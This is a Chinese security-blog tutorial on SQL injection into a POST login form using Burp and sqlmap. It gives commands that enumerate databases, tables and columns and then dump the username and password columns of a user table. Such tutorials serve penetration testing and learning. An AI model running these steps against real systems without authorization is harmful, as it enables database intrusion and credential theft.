小白安全博客

小白记忆
专注网络安全

 sqlmap之POST登陆框注入方式一

注入方式一:


1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下




2.列数据库:


sqlmap.py -r "###" -p n --dbs

注:-r表示加载一个文件,-p指定参数




其中出现了三次提示:


it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
它看起来像后端DBMS是'MySQL'。 是否要跳过特定于其他DBMS的测试负载? [Y/n]  输入"Y"

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
对于剩余的测试,您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗? [Y/n] 输入"N"
POST parameter 'n' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
POST参数'n'是脆弱的。 你想继续测试其他人(如果有的话)吗?[y/N]  输入"Y"


以下是猜解出来的一些数据库总共有13个数据库。




3.猜表 


选择一个数据库,比如选fendo


sqlmap.py -r "###" -p n -D fendo --tables  






得到user表。


4.猜列

sqlmap.py -r "###" -p n -D fendo -T user --columns  


 5.猜数据

sqlmap.py -r "####" -p n -D fendo -T user -C “username,password” --dump  



×

感谢您的支持,我们会一直保持!

扫码支持
请土豪扫码随意打赏,请先点一下下面的付款方式

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

 您阅读这篇文章共花了:

打赏作者
版权所有,转载注明出处:小白安全博客-菜鸟安全博客-小白个人博客 » sqlmap之POST登陆框注入方式一»https://www.xiaobaibk.com/xiao-bai-61.html

发表评论

表情

网友评论(0)